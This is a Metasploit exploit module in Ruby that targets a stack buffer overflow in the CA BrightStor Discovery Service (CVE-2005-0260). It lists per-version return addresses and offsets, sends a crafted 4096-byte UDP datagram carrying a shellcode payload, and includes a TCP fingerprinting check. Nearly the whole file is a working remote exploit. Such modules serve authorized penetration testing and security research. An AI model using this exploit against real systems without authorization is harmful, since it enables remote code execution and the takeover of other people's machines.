##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
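class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  # TCP is used only by +check+ (discovery fingerprint on port 41523);
  # the overflow itself travels over UDP to RPORT (default 41524).
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CA BrightStor Discovery Service Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a vulnerability in the CA BrightStor
          Discovery Service. This vulnerability occurs when a large
          request is sent to UDP port 41524, triggering a stack buffer
          overflow.
        },
        'Author' => [ 'hdm', 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-0260'],
          [ 'OSVDB', '13613'],
          [ 'BID', '12491'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],
        ],
        'Privileged' => true,
        'Payload' => {
          # 2048 bytes placed at offset 1046 of a 4096-byte buffer still
          # ends at 3094, inside the buffer (see +exploit+).
          'Space' => 2048,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500
        },
        'Targets' => [
          [
            'cheyprod.dll 12/12/2003',
            {
              'Platform' => 'win',
              'Ret' => 0x23808eb0, # call to edi reg
              'Offset' => 968
            },
          ],
          [
            'cheyprod.dll 07/21/2004',
            {
              'Platform' => 'win',
              'Ret' => 0x2380a908, # call edi
              'Offset' => 970
            },
          ],
        ],
        'DisclosureDate' => '2004-12-20',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(41524)
      ]
    )
  end

  # Fingerprints the discovery service over TCP without sending the overflow.
  #
  # Two probes go to port 41523: 'META' (expected to produce no reply) and
  # 'hMETA' (expected, per the original comment, to be answered with the
  # host name). Only the "silent, then answered" pattern is reported as
  # Detected. No version is identified, so this never returns
  # Appears/Vulnerable, and a target that answers both probes is reported
  # Safe.
  #
  # @return [Msf::Exploit::CheckCode] Detected or Safe
  def check
    # The first request should have no reply
    x = discovery_probe('META')

    # The second request should be replied with the host name
    y = discovery_probe('hMETA')

    return Exploit::CheckCode::Detected if y && !x

    Exploit::CheckCode::Safe
  end

  # Sends one 4096-byte UDP datagram: random text with the return address
  # at the target's Offset and the payload at a fixed position.
  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    buf = rand_text_english(4096)

    # Target 0:
    #
    # esp @ 971
    # ret @ 968
    # edi @ 1046
    # end = 4092

    # 32-bit little-endian return address at the per-target Offset
    # (968 for target 0, 970 for target 1).
    buf[target['Offset'], 4] = [ target.ret ].pack('V')
    # NOTE(review): the payload position 1046 comes from the target-0 layout
    # above but is used unchanged for target 1 — not confirmed from this file.
    buf[1046, payload.encoded.length] = payload.encoded

    udp_sock.put(buf)
    # Waits for any reply; the read timeout is whatever recvfrom applies by
    # default — verify against the UDP mixin if hangs are observed.
    udp_sock.recvfrom(8192)

    handler
    disconnect_udp
  end

  private

  # Sends +data+ to the discovery service's TCP port and returns what
  # get_once read within 3 seconds, closing the socket even when the send
  # or read raises (the original opened two sockets and could leak one on
  # error).
  #
  # @param data [String] probe bytes to send
  # @return [String, nil] the reply; presumably nil when nothing arrived in
  #   time — +check+ only relies on truthiness
  def discovery_probe(data)
    csock = Rex::Socket::Tcp.create(
      'PeerHost' => datastore['RHOST'],
      'PeerPort' => 41523,
      'Context' =>
        {
          'Msf' => framework,
          'MsfExploit' => self
        }
    )

    csock.put(data)
    csock.get_once(-1, 3)
  ensure
    csock.close if csock
  end
end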